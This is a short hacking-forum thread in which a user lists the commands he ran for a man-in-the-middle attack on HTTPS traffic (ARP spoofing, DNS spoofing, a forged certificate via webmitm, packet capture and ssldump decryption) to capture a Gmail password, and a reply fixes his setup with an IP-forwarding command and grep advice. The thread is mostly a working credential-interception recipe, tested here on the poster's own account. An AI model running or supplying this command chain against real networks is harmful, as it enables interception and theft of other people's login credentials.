Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

How to decrypt SSL traffic using a MITM attack

  1. Home
  2. Forum
  3. Questions
  4. How to decrypt SSL traffic using a MITM attack

ghost's Avatar

ghost

0 0

http://www.hackerscenter.com/index.php?/Video/General/How-to-decrypt-SSL-encrypted-traffic-using-a-man-in-the-middle-attack-Auditor.html

I've followed this step by step and have not had any luck capturing my own password.. what might I be doing wrong?

commands ran–

fragrouter -B1 arpspoof -t XX.XX.XX.XX XX.Router.IP.ADD webmitm (made a cert) dnsspoof

wireshark (and start recording everything)

On the victim machine when I perform an nslookup on gmail , the ip address is from my local area network.

Secondly on the victim machine, when I visit gmail.com over https, there is a warning about the fake certificate I issued using the attackers rig.

Log in to my own account.

Switch back to the attackers rig.

Save the captured packets.

Then I ran : ssldump -r capture -k webmitm.crt -d > out

Lastly: cat out | grep 'Passwd'

I get nothing, and I looked through the out file and it seems like I am recording the traffic that is for gmail.com .. but I can't see my own password.. any ideas?

Thank you guys for any words of wisdom.


ghost's Avatar

ghost

0 0

more than one way to skin a cat

no need for fragrouter: markupecho "1" > /proc/sys/net/ipv4/ip_forward

and remember

markupLastly: cat out | grep 'Passwd

linux is case sensitive and read the manual

markupman grep